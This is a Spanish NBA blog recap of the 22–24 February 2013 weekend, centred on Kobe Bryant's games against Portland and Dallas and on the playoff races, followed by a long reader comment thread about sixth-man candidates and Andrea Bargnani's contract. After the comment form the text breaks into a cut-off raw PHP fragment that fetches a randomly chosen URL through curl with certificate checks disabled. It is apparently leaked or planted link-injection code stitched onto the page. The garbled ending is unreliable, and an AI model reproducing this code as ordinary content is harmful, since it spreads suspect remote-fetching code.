Informe del fin de semana: Kobe se aferra a los Playoffs

25 de February de 2013 por MagicJohnson32

VIERNES

Casi todo lo destacable del viernes noche tuvo que ver con la lucha por las últimas plazas de Playoffs en la Conferencia Oeste. Casi, porque también vimos cómo los Raptors, ante la aparente dimisión de los Sixers, presentaban su candidatura a la octava posición del Este. Con Rudy Gay ejerciendo de líder, los de Toronto superaron a los Knicks en un final muy igualado, 98-100, pese a que Bargnani se quedó a cero por segundo partido consecutivo. Los otros dos partidos que enfrentaban a equipos del Este sólo sirvieron para exhibir la incontestable superioridad de Pacers y Bulls sobre Pistons y Bobcats respectivamente.

JJackEl mejor partido de la noche fue seguramente el que disputaron Warriors y Spurs en Oakland, donde los locales estrenaron su camiseta con mangas y se impusieron a San Antonio por primera vez en más de cinco años. Necesitaron remontar 13 puntos en el último cuarto pero finalmente, después de que Ginóbili forzase la prórroga, los de Mark Jackson tumbaron al mejor equipo de la liga. Jarret Jack se convirtió en el primer suplente que logra 30-10 desde que Magic Johnson lo hiciera en 1996 y David Lee firmó otro 20-20. Con esta victoria y tras ganar el miércoles a los Suns, los Warriors cierran la hemorragia de derrotas que empezaba a sembrar las primeras dudas sobre el equipo.

No fallaron tampoco Rockets, Lakers y Mavs. Todavía sin Thomas Robinson a su disposición, McHale salió en Brooklyn con un small-ball radical que resultó efectivo: impulsados por un 16 de 30 en triples, los Rockets vencieron por 13ª vez seguida a los Nets, que no pudieron contar con Joe Johnson y perdieron la oportunidad de igualar a los Knicks al frente de la Atlantic. En el triunfo de los Mavs en New Orleans, el protagonismo se lo llevó Vince Carter, de nuevo excelente y que anotó el triple de la victoria el día en que superó a Gary Payton en la lista histórica de anotadores. Aunque si hablamos de viejos rockeros, ninguno toca la guitarra como Kobe Bryant, que rindió su particular homenaje a Jerry Buss con 40 puntos (su 130º partido de 40 o más) en una soberbia serie de 15 de 23 en tiros. Batum, Hickson y Lillard mantuvieron a los Blazers siempre en la lucha por la victoria, pero los puntos de Bryant y la labor defensiva de Howard dieron la victoria a los Lakers. Portland sumaba con ésta siete derrotas seguidas y las esperanzas de Playoffs empiezan a esfumarse. 

Los que sí se vieron sorprendidos fueron los Nuggets, que cayeron en Washington y ven como los Grizzlies y la cuarta posición se alejan un poco más. Denver necesita mejorar su rendimiento lejos de Colorado si quiere optar a cotas más altas, y los Wizards ya no son la pera en dulce de principio de temporada. Resultado: victoria de los capitalinos 113-119. Los Grizzlies, como decimos, abrieron hueco y, con un gran Marc Gasol, lograron ante los Magic su sexta victoria seguida.

La madrugada se completó con victorias contundentes de los Hawks sobre los Kings, de los Thunder ante Minnesota T’Wolves y de los Celtics en Phoenix, donde Jordan Crawford debutó con la camiseta de Boston y Jeff Green se salió (31 puntos, 7 rebotes, 5 tapones, 4 asistencias) en lugar de Garnett, a quien Rivers dio descanso.

SÁBADO

Los resultados del sábado contribuyeron a apretar la lucha por la 7ª y 8ª posición del Oeste, ya que los dos equipos que en estos momentos las ocupan perdieron: los Rockets, en Washington, y los Jazz, en pista de los Clippers. Houston, que tan a menudo vive del triple, murió del triple esta vez, y los Wizards completaron un fin de semana de lo más esperanzador con sus dos victorias sobre Nuggets y Rockets. Los Jazz, por su parte, poco pudieron hacer con tres titulares -Foye, Tinsley y Williams- que no anotaron un solo punto en una plaza tan complicada como la de LAC. De esta manera, los Clippers pudieron olvidar la paliza encajada ante San Antonio.

Redick Bucks

Los Nuggets, tras caer 24 horas antes, se desquitaron en Charlotte en una de sus habituales actuaciones en las que todo el equipo aporta. No pudieron desquitarse los Pistons, que volvieron a ser aplastados por los Pacers, esta vez en su propia pista. Con esta victoria, Indiana se situaba segundo de la Conferencia Este.

Los Cavs no necesitaron una gran actuación de Irving para imponerse en Orlando, pese a los buenos debuts de Udrih y Tobias Harris para los Magic, y los Sixers fueron un juguete en manos de los Heat. Philly no tuvo nada que hacer ante el triple doble de LeBron y un Wade prácticamente infalible.

El notable estreno de Redick (16 puntos, 7 asistencias) con los Bucks lo estropeó Al Horford, que fue el mejor del partido y autor de la canasta ganadora a 5 segundos para el final. Josh Smith estuvo muy fallón ante el que hace unos días pudo convertirse en su equipo, pero Harris y Teague compensaron con 44 puntos entre ambos.

DOMINGO

kobe dallasPocas veces un partido entre equipos fuera de Playoffs llega rodeado de tanta expectación como el que disputaron Lakers y Mavs ayer por la tarde. Si las urgencias por la clasificación de ambos no eran suficiente, Mark Cuban tuvo la brillante idea de sugerir que los Lakers deberían amnistiar a Kobe Bryant. Lo que se vio en el AA Center fue a dos conjuntos liderados por dos jugadores extraordinarios. Dirk Nowitzki completó su mejor actuación de la temporada (30 puntos, 13 rebotes) pero Bryant estuvo soberbio, especialmente en el tramo final, y condujo a los Lakers a su tercera victoria seguida con 38 puntos, 12 rebotes y 7 asistencias, del todo necesarios ante la calamitosa actuación de World Peace y el día gris de Howard. Kobe remató su venganza en tweeter con el ya célebre “Amnesty THAT” y la octava plaza ya queda un poco más cerca para LAL.

A continuación, los Warriors volvieron a llevarse un partido tras remontar, esta vez 16 puntos, en Minnesota. Los Timberwolves salieron entonadísimos, con Ricky al timón y Derrick Williams de ejecutor. Cuando empezaron las rotaciones, el encuentro se equilibró. Mientras Barea, Shved y Cunningham estuvieron negados, Jarret Jack y Landry lideraron la remontada, que se consumó en los últimos minutos y sólo quedó sellada cuando Ridnour falló el lanzamiento que pudo haber dado el triunfo a los locales. Ricky, pese a sus fallos en el tiro y las seis pérdidas, firmó una estadística al alcance de muy pocos: 16 puntos, 11 asistencias, 8 rebotes y 6 robos.

Uno de los rivales de los Warriors en la lucha por la cuarta posición del Oeste, los Memphis Grizzlies, ganaron en un partido con tanteo de Euroliga a los Brooklyn Nets y ya encadenan 7 victorias consecutivas. Los ositos se pusieron las pilas en defensa y ahogaron a los jugadores contrarios. Joe Johnson volvió a ser baja y solo Deron Williams pudo escapar de la telaraña rival.

Los dos primeros de la conferencia, San Antonio Spurs y Oklahoma City Thunder, vencieron sin problemas a Phoenix y Chicago respectivamente. Podíamos esperarlo de los primeros pero la contundencia de la derrota de los Bulls fue sorprendente, y es que acabaron perdiendo por 30 puntos tras anotar tan solo el 29% de los tiros intentados. Una actuación vergonzosa y sin excusas. Los Thunder, por su parte, anunciaron pocas horas después del partido que volvían a hacerse con Derek Fisher, quien llega por lo que queda de temporada.

En el Este, victorias de los Heat ante los Cavs y de los Knicks ante los Sixers. Los campeones vivieron una auténtica montaña rusa en un partido que ganaban por 22 puntos al inicio de la 2ª parte y que perdían por 8 a falta de 5 minutos para el final. Finalmente se llevaron la victoria con Wade absolutamente determinante en un duelo que sirvió sobre todo para alimentar las especulaciones de un posible retorno de LeBron a Cleveland. A New York llegaban dos equipos necesitados de la victoria y finalmente fueron los Knicks los que se la llevaron de la mano de Carmelo y Stoudamire, que jugó su mejor partido de la temporada. La vuelta de Thaddeus Young no sirvió a Philadelphia para llevarse la victoria. Al menos ahora Holiday no se encontrará tan solo.

Finalmente, victoria intrascendente de Hornets sobre los Kings y derrota de los Celtics en la pista de los Blazers, que al fin cerraron la racha negativa con una actuación decisiva de Wesley Matthews.

PREMIOS

MVP: Pocas dudas este fin de semana a pesar de que habituales como LeBron James y Kevin Durant han ganado sus dos partidos. Kobe Bryant nos ha brindado dos auténticas exhibiciones en las dos victorias de los Lakers ante rivales incómodos como Portland o Dallas. A los primeros les clavó 40 puntos y a los segundos 38 pero es que además en estos dos partidos anotó 28 de sus 44 tiros de campo, cogió 19 rebotes y repartió 11 asistencias. Jarrett Jack también merece ser destacado tras liderar a los Warriors a dos victorias consecutivas que cimentan su candidatura a mejor sexto hombre de la temporada.

Rookie: Este ha sido el fin de semana de Bradley Beal, que día a día parece ir mejorando. 2 victorias de los Wizards con su inestimable aportación: 17 puntos y 12 rebotes el viernes y 21 puntos y rebotes el sábado. Anthony Davis, Dion Waiters y Damian Lillard sólo han tenido uno de los dos días buenos.

Sorpresa: El viernes nos dejó partidazos de Jeff Green (31 puntos, 7 rebotes, 4 asistencias, 5 tapones) e Isaiah Thomas (30 puntos, 6 rebotes, 9 asistencias) a los que no estamos del todo acostumbrados.

Esfuerzo en vano: Dos tremendos partidos de Jrue Holiday y dos derrotas para los Sixers. El sábado fueron 21 puntos con un 8 de 11 en tiro, 6 rebotes y 6 asistencias y ayer, 30 puntos, 5 rebotes y 5 asistencias.

Comenta

29 comentarios a esta entrada

  1. Alfredo dice:
    #1

    A nadie más le parece un escándalo la temporada de Jarret Jack desde el banco?? Puede entrar en las quinielas de mejor sexto hombre??

      Citar

  2. Esteban dice:
    #2

    Alfredo:
    A nadie más le parece un escándalo la temporada de Jarret Jack desde el banco?? Puede entrar en las quinielas de mejor sexto hombre??

    seguramente q entre en la conversacion, pero me da toda la sensacon que ese premio se lo llevara j.r. smith

    LOS PACERS ya llegaron al segundo lugar y el regreso de GRANGER solo deberia hacerlos mejorar en un papel de sexto hombre anotador, puede darle la creatividad ofensiva que escasea en indiana

    sin dudas, al dia de hoy son los candidatos para enfrentar al heat en final de conferencia no?

      Citar

  3. MagicJohnson32 dice:
    #3

    Alfredo:
    A nadie más le parece un escándalo la temporada de Jarret Jack desde el banco?? Puede entrar en las quinielas de mejor sexto hombre??

    Yo lo digo en la crónica, que con estas dos actuaciones se mete de lleno entre los favoritos al premio.

      Citar

  4. HisRoyalAirness dice:
    #4

    Esteban: seguramente q entre en la conversacion, pero me da toda la sensacon que ese premio se lo llevara j.r. smith

    LOS PACERS ya llegaron al segundo lugar y el regreso de GRANGER solo deberia hacerlos mejorar en un papel de sexto hombre anotador, puede darle la creatividad ofensiva que escasea en indiana

    sin dudas, al dia de hoy son los candidatos para enfrentar al heat en final de conferencia no?

    JR Smith? Para mí que se lo lleva Crawford bastante de calle

      Citar

  5. Jose Luis dice:
    #5

    Para mi JR no se lo llevara, me parece de Crawford o Jack, y quiza Redick o Ryan Anderson.

    Cada vez entiendo menos la marcha de Brewer de los Knicks. Los equipos potentes del Este tienen un buen alero. (George, Pierce, James) y Anthony va a desgastarse defendiéndolos? Shumpert, Smith y Novak no pueden defender a estos jugadores. Brewer era pieza clave y cobraba el mínimo, y ahora buscan a Kenyon Martin para una ya amplia rotacón interior (Chandler, Camby, Rasheed, Thomas, Stoudemire) y contando con que Melo juega de 4 muchas veces. Me parece el gran error de los Knicks, y casi el peor movimiento del trade deadline (pugnando con los Kings y. Su pérdida de Thomas Robinson).

      Citar

  6. Esteban dice:
    #6

    HisRoyalAirness: JR Smith? Para mí que se lo lleva Crawford bastante de calle

    no se, me suena que el avance de los knicks de ser un pesimo equipo a uno de los mejores de la nba, tiene mucho que ver con smith y su mejor temporada como profesional

    mientras que los clippers estan mas o menos donde estaban el año pasado, y si bien crawford mete y mete puntos, ya ha sido nombrado sexto himbre en algun momento y lo de smith es mas novedoso

    ryan anderon estraria de lleno en la discusion si su equipo al menos peleara por entrar a PO, estando donde esta los hornets no tiene ninguna chance

      Citar

  7. txusma dice:
    #7

    Pues yo entre Jack, Smith y Crawford creo que se lo merece más Jack.

    Smith juega 4 minutos más que los otros dos que quieras que no ya se nota y Crawford está anotando pero con porcentajes bastante pobres. Su nivel no es el mismo que el de principio de temporada.

      Citar

  8. Esteban dice:
    #8

    q bien le ha vanido a los raptors la llegada de GAY, callando practicamente todas las bocas de este blog, ha superado todas las expectativas

    con el mejoro derozan y tambien lowry, y ni hablar del buen regreso de valanciunas

    bueno, flojisimo lo de bargnani, vale algo al final? dificilmente encientran un buen comprador para el, a este nivel va para la amnisitia, necesita cambiar de aires urgentemente

      Citar

  9. Jose Luis dice:
    #9

    Con él, DeRozan está más libre y puede jugar más. Lástima la merma de minutos de Ross, espero que gane algunos minutos en la rotación. Lowry y DeRozan no se sienten tan solos anotando.

      Citar

  10. Esteban dice:
    #10

    ahora mismo los taptors son el 8tavo mejor equipo del este, soplo que arrancaron muy por detras de los bucks, pero cuidadito que de seguir asi, bucks perdiendo y perdiendo y los raptors levantando, pueden meterse en PO este año

      Citar

  11. Ruxixón dice:
    #11

    Ayer leí un comentario que hacia referencia a las posibilidades de los Raptors.Hablaba de que para meterse en PO habría que pedirles un 50% en el balance,yo lo rebajo un poco y pienso que con un 40-42 te puedes llegar a meter.Bien,de los 26 partidos que quedan a los Raptors tendrían que hacer un 17-9 para llegar a ese balance de victoria/derrotas,es decir,un 65 % de victorias,porcentaje que a día de hoy en toda la liga sólo tienen Miami y los 4 mejores del oeste.

    Los Bucks que ahora están con un 26-28 tendrían que hacer un 14-14,guarismos más realistas para los equipos de los que estamos hablando.

    Confiaba que los Raptors pudieran meterse pero con esos datos parece casi imposible,aunque si miras el 70% de los últimos 10 partidos…

      Citar

  12. Simon dice:
    #12

    Creo que Raptors no va a llegar a PO. si la liga fuera de 100 partidos tendrian opciones pero en 82 no van a llegar… Si la temporada empezara hoy por supuesto que estarían pero han tardado demasiado en comenzar a vencer.

    En cuanto al premio a sexto hombre:
    – Si fuera por los dos primeros meses de competición sin duda se lo llevaba Jamal Crawford, sin embargo su rendimiento me da la sensación que ha caido mucho despues. Números aparte.
    – JR Smith está haciendo una gran temporada pero creo que la de Jack está siendo superior. Jack está anotando, dirigiendo y aportando experiencia a un grupo muy joven que, sin las 6 o 7 derrotas seguidas que tuvieron recientemente estarían luchando por la cuarta plaza. No se, en concreto me parece mas importante la aportación de Jack. Aunque cada uno en su papel y rol están rindiendo de 9 para sus franquicias.
    Reddick y Anderson ni los cuento pues sus equipos estan muy hundidos en la clasificación.

      Citar

  13. safd dice:
    #13

    Bucks tienne que jugar 2 veces contra Orlando y 2 contra Charlotte, mas una contra Wolves, otra contra SAC y otra contra Dallas, los otros 21 partidos son todos contra equipos de PO y no de los malos precisamente… De hecho en sus 6 proximos partidos reciben a Toronto (que ese partido sera clave), Utah y tiene que visitar a Dallas, Houston, LAC y GSW…

    Antes de jugar el Toronto-Milwauke, Toronto tiene que jugar contra Washinton, en Cleveland y recibir a Indiana (lo logico seria llegar a ese partido con un 25-34), y Bucks tienen que jugar antes de ese partido en Dallas y HOU (que pueden sacar un 0-2 perfectamente, y casi que es lo logico, con lo que llegarian con un 26-30)… si ese partido lo ganase Toronto, yo creo que terminarian pasando a Bucks si todo va con las dinamicas actuales, sobretodo con el calendario de BUcks

      Citar

  14. Ekos dice:
    #14

    Yo realmente confío en que tanto Raptors como Lakers entren en Play-offs, los damnificados serían Bucks y Jazz, porque los Rockets van a mejor cada día…

    Sobre el fin de semana… los Wizards se consolidan como un equipo candidato a entrar en PO el siguiente años, Cleveland también, pues ambos contarán con una buena ronda que, aunque sea de un mal draft no dejan de ser jugadores útiles en una rotación, esto, sumado al crecimiento de sus jóvenes (Beal, Wall, Seraphin, Singleton y Vesely en los Wizards; Irving, Waiters, Thompson, Zeller, trade x Varejao, Speights, Selby, Gee, etc en los Cavs) los impulsaría perfectamente a los PO, sobre todo a los de Cleveland, que deberían de buscar un trade por Varejao que les aporte jóvenes útiles en una rotación y algún alero en la agencia libre o en el Draft con el fin de usar a Gee de sexto hombre, esto les dejaría algo así:

    Irving – Waiters – alero – Thomson – Zeller + joven útil, joven útil, joven útil, Selby, Speights, Gee, Miles y Ellington. Gran equipo.

    Y la verdad creo que me he ido por las ramas, que iba a hablar del fin de semana…

    Un saludo jjeejee

      Citar

  15. Ekos dice:
    #15

    Y ahora sí, el fin de semana.

    Los Warriors comandados por Jack y Lee, ambos a un grandísimo nivel, lo que les da esperanzas de quizás poder lanzarse a por la cuarta plaza (?). Gran partido de Stoudemire y los Pacers que continúan imparables, cuidado que con la llegada de Granger más el poderío interior con el que cuentan (Hibbert – Mahinmi – West) podrían poner en más de un apuro a los Heat en PO.

      Citar

  16. safd dice:
    #16

    Ekos:
    Yo realmente confío en que tanto Raptors como Lakers entren en Play-offs, los damnificados serían Bucks y Jazz, porque los Rockets van a mejor cada día…

    Sobre el fin de semana… los Wizards se consolidan como un equipo candidato a entrar en PO el siguiente años, Cleveland también, pues ambos contarán con una buena ronda que, aunque sea de un mal draft no dejan de ser jugadores útiles en una rotación, esto, sumado al crecimiento de sus jóvenes (Beal, Wall, Seraphin, Singleton y Vesely en los Wizards; Irving, Waiters, Thompson, Zeller, trade x Varejao, Speights, Selby, Gee, etc en los Cavs) los impulsaría perfectamente a los PO, sobre todo a los de Cleveland, que deberían de buscar un trade por Varejao que les aporte jóvenes útiles en una rotación y algún alero en la agencia libre o en el Draft con el fin de usar a Gee de sexto hombre, esto les dejaría algo así:

    Irving – Waiters – alero – Thomson – Zeller + joven útil, joven útil, joven útil, Selby, Speights, Gee, Miles y Ellington. Gran equipo.

    Y la verdad creo que me he ido por las ramas, que iba a hablar del fin de semana…

    Un saludo jjeejee

    Pues yo en Zeller no veo un pivot titular para un contender… eso si, puede ser un suplente muy bueno para los jugadores de dentro. De hecho, yo no me desharia tan facil de Varejao, sobretodo si sigue al nivel de este año (que posiblemente no, pero bueno, yo me la jugaria) , porque por mucho draft y joven, tener al maximo reboteador de la liga es un lujo, y aunque igual cuando vuelva posiblemente ya no lo sea, arriesgarse por el maximo reboteador para mi vale la pena.

      Citar

  17. Esteban dice:
    #17

    buenas discuciones

    creo tambien q sera dificil q los raptors clasifiquen, pero si vemos los ultimos juegos, los canadienses vienen en levantada, mientras q los bucks pierden muy seguido, de hecho lo que los mantiene medio comodo en la clasificacion fue su arranque, de ahi vienen en nivel descendente

    los wizards tenian este año las chances de ir a PO, obviamente que sin nene y wall casi toda la primera parte de la temporada, eran el peor equipo de la liga, pero una vez vueltos estos, wall y beal forman la dupla de nivel que se esperaba q hicieran, mientras q nene y okafor muestran el nivel que YO esperaba que tuvieran, sin dudas que si beal progresa el proximo año deberian estar en la lucha por PO

    los cavs aun estan demasiado verdes para mi gusto, pero este año tendran otra seleccion alta de draft y espacio para fichar algun jugador de nivel medio alto, con eso, su futuro para estar asegurado, mas ahora q irving parece haber dejado atras sus lesiones

      Citar

  18. rumbero dice:
    #18

    safd: Pues yo en Zeller no veo un pivot titular para un contender… eso si, puede ser un suplente muy bueno para los jugadores de dentro. De hecho, yo no me desharia tan facil de Varejao, sobretodo si sigue al nivel de este año (que posiblemente no, pero bueno, yo me la jugaria) , porque por mucho draft y joven, tener al maximo reboteador de la ligaes un lujo, y aunque igual cuando vuelva posiblemente ya no lo sea, arriesgarse por el maximo reboteador para mi vale la pena.

    Yo tampoco me desharía de él así como así, pero si aprovechan el hype que ha tenido esta temporada para poder sacar algo bueno por él hay que plantearselo. Con 30 años que tiene y la base tan joven de este equipo y los continuos problemas de lesiones en las últimas temporadas entiendo que desde la franquicia se lo vayan a pensar si llega una oferta. Y Zeller está verdecillo, pero hay que verlo algo más como al resto de los Cavs, que son muy poyuelos aunque con Irving te puedas ir ya a la guerra

      Citar

  19. Esteban dice:
    #19

    otro tema a discutir es que hacer en canada con bargnani, la pasada temporada hasta su lesion estaba en nivel all-star, 23 puntos por juego y varias canastas ganadoras

    este año arranco flojo, pero al parecer, volvio de la lesion desconocido completamente, imaginaba que jugar al lado de un primer espada como gay, y con otra segunda como derozan, iba a darle espacio y quitarle presion, lo que lo haria un mas que valido tercer espada, pero nada mas lejano a la realidad,

    su contrato no seria tan malo si al menos jugara como a principio de año, pero visto lo ultimo de el, parece merecer una amnistia YA, el o kleiza jugaran en otro equipo el proximo año

      Citar

  20. nba dice:
    #20

    Bargnani parece que ya ha entrado en modo vacaciones “on” , gastar una amnistia en este tio… , si al menos se hubiese merecido alguna vez el pastizal que gana, pero si encima lo mandas ahora a casa, que sufra al menos lo que queda de regular y los entrenos con su equipo

      Citar

  21. Esteban dice:
    #21

    nba:
    Bargnani parece que ya ha entrado en modo vacaciones “on” , gastar una amnistia en este tio… , si al menos se hubiese merecido alguna vez el pastizal que gana, pero si encima lo mandas ahora a casa, que sufra al menos lo que queda de regular y los entrenos con su equipo

    tampoc es un contrato TAN malo, si mantiviera los guarismos de la pasada temporada o se mantuviera como inciio esta, 10 millones al año es lo q cobra cualquier tio titular en esta liga, y siendo aun mas viejos que bargnani, el problema es q no mantiene ese guarismos sino que ha bajado sus prestaciones

      Citar

  22. Denise dice:
    #22

    Hablais de amnistia como si fuese una panacea o algo…Bargnani esta haciendo una pesiam temporada pero tampoco como para amnistiarlo. Si puedes empaquetarlo a otro sitio bien, si no, pues te lo quedas y que aporte lo que pueda, pero amnistiarlo para que tengas que seguir pagandole la millonada que cobra y el mamon se vaya por el minimo a jugar con otro equipo…de eso nada

    Así, puede darse la circunstancia de que lo amnisties, le estes pagando sus 11 millones y encima te comas 30 puntos suyos cuando te enfrentes contra él. Además, los Raptors tampoco se sobresalen tanto del limite salarial como para que les tenga que preocupar las multas.

      Citar

  23. Esteban dice:
    #23

    Denise:
    Hablais de amnistia como si fuese una panacea o algo…Bargnani esta haciendo una pesiam temporada pero tampoco como para amnistiarlo. Si puedes empaquetarlo a otro sitio bien, si no, pues te lo quedas y que aporte lo que pueda, pero amnistiarlo para que tengas que seguir pagandole la millonada que cobra y el mamon se vaya por el minimo a jugar con otro equipo…de eso nada

    Así, puede darse la circunstancia de que lo amnisties, le estes pagando sus 11 millones y encima te comas 30 puntos suyos cuando te enfrentes contra él. Además, los Raptors tampoco se sobresalen tanto del limite salarial como para que les tenga que preocupar las multas.

    la amnistia se plantea mi querido denise, por que los RAPTORS estaran en mas de 70 millones con este mismo plantel el proximo año, recuerda el contrato de gay, el de derozan, jhonson, kleiza, bargnani, lowry y hasta el de valanciunas

    todos no podran estar el proximo año sin pagar el impuesto de lujo

      Citar

  24. Denise dice:
    #24

    Esteban: la amnistia se plantea mi querido denise, por que los RAPTORS estaran en mas de 70 millones con este mismo plantel el proximo año, recuerda el contrato de gay, el de derozan, jhonson, kleiza, bargnani, lowry y hasta el de valanciunastodos no podran estar el proximo año sin pagar el impuesto de lujo

    Ya lo sé, mi querido y estimado Esteban pero creo la amnistía es como el suicidio, solo debe hacerse a ultima hora en caso de desesperación. Si los Raptors no quieren pagar impuesto de lujo o quieren pagar poco, deben intentar traspasar a Bargnani, si no lo consiguen traspasar a De Rozan o Amir Johnson por algun jugador mas alguna ronda de Draft.

    No soy fan de Bargnani, pero tampoco está en modo Biedrins ni cobra una barbaridad como Rashard Lewis o Arenas en su época

      Citar

  25. Esteban dice:
    #25

    Denise: Ya lo sé, mi querido y estimado Esteban pero creo la amnistía es como el suicidio, solo debe hacerse a ultima hora en caso de desesperación. Si los Raptors no quieren pagar impuesto de lujo o quieren pagar poco, deben intentar traspasar a Bargnani, si no lo consiguen traspasar a De Rozan o Amir Johnson por algun jugador mas alguna ronda de Draft.

    No soy fan de Bargnani, pero tampoco está en modo Biedrins ni cobra una barbaridad como Rashard Lewis o Arenas en su época

    pero denise, estamos totalmente en la misma, si traspasas a Bargnani por otro tio que cobre 10 millones seguiran pagando impuiesto de lujo
    peor aun si ofrecen a boozer q cobra 20 a cambio de bargnani

    jugando como lo esta haciendo hoy nadie ofrecera una trade exepcion por bargnani ni un expiring, años atras quiza si pero hoy su valor es muy muy bajo

    coincido que siempre me parecio bueno el contrato de bargnani, comprandolo por ejemplo con el de gay, gallinari, granger, etc entre otros jugadores que no terminan de ser jugadores franquicia, andrea no cobraba de mas, pero visto lo ultimo del italiano, parece que va derecho a la categoria de biedrins

      Citar

  26. Denise dice:
    #26

    Pero tampoco creo que en Toronto esten tan obsesionados con no sobrepasar el limite salarial y pagar multa, si no, se hubiesen quedado con el expiring de Calderon y no se hubiesen hecho con Gay.
    Digo yo que adquirir a Gay es un intento de hacer un equipo competitivo, y hoy en día no se hace un equipo competitivo manteniendo a este por debajo del limite salarial, a no ser que hayas tenido suerte y hayas recopilado 2 ó 3 rookies interesantes…que no es el caso de Toronto.

      Citar

  27. Ekos dice:
    #27

    safd: Pues yo en Zeller no veo un pivot titular para un contender… eso si, puede ser un suplente muy bueno para los jugadores de dentro. De hecho, yo no me desharia tan facil de Varejao, sobretodo si sigue al nivel de este año (que posiblemente no, pero bueno, yo me la jugaria) , porque por mucho draft y joven, tener al maximo reboteador de la ligaes un lujo, y aunque igual cuando vuelva posiblemente ya no lo sea, arriesgarse por el maximo reboteador para mi vale la pena.

    Hombre, es su primer año aún en la NBA, si mejora su repertorio de movimientos en ataque habría que tenerlo bastante en cuenta. No digo mandar a Varejao por nada, lo ideal sería un Varejao por un pívot, una ronda buena y un jugador con proyección, de esta manera te quedaría una rotación más útil y extensa, sobre todo por dentro.

    Y yo creo que es imposible o muy improbable que Varejao siga a este nivel el próximo año, nunca se sabe, pero lo mejor creo que es aprovechar la ocasión y traer algo para ir asentando los cimientos de este equipo.

      Citar

  28. Ekos dice:
    #28

    No se me da bien esto de citar…a ver ahora

    safd: Pues yo en Zeller no veo un pivot titular para un contender… eso si, puede ser un suplente muy bueno para los jugadores de dentro. De hecho, yo no me desharia tan facil de Varejao, sobretodo si sigue al nivel de este año (que posiblemente no, pero bueno, yo me la jugaria) , porque por mucho draft y joven, tener al maximo reboteador de la ligaes un lujo, y aunque igual cuando vuelva posiblemente ya no lo sea, arriesgarse por el maximo reboteador para mi vale la pena.

    Hombre, es su primer año aún en la NBA, si mejora su repertorio de movimientos en ataque habría que tenerlo bastante en cuenta. No digo mandar a Varejao por nada, lo ideal sería un Varejao por un pívot, una ronda buena y un jugador con proyección, de esta manera te quedaría una rotación más útil y extensa, sobre todo por dentro.

    Y yo creo que es imposible o muy improbable que Varejao siga a este nivel el próximo año, nunca se sabe, pero lo mejor creo que es aprovechar la ocasión y traer algo para ir asentando los cimientos de este equipo.

      Citar

  29. Ekos dice:
    #29

    Esteban:
    buenas discuciones

    creo tambien q sera dificil q los raptors clasifiquen, pero si vemos los ultimos juegos, los canadienses vienen en levantada, mientras q los bucks pierden muy seguido, de hecho lo que los mantiene medio comodo en la clasificacion fue su arranque, de ahi vienen en nivel descendente

    los wizards tenian este año las chances de ir a PO, obviamente que sin nene y wall casi toda la primera parte de la temporada, eran el peor equipo de la liga, pero una vez vueltos estos, wall y beal forman la dupla de nivel que se esperaba q hicieran, mientras q nene y okafor muestran el nivel que YO esperaba que tuvieran, sin dudas que si beal progresa el proximo año deberian estar en la lucha por PO

    los cavs aun estan demasiado verdes para mi gusto, pero este año tendran otra seleccion alta de draft y espacio para fichar algun jugador de nivel medio alto, con eso, su futuro para estar asegurado, mas ahora q irving parece haber dejado atras sus lesiones

    Hombre, sí, no te voy a negar que están verdes pero si aciertan con la ronda y con el trade por Varejao (o quedándose a Varejao), los jóvenes siguen creciendo y se fichan a un agente libre pueden hacer sus 35-40 victorias y luchar por PO, y por qué no, ir.

    También un mérito importante de los Cavs es que casi siempre que pierden lo hacen por poco, algo curioso.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>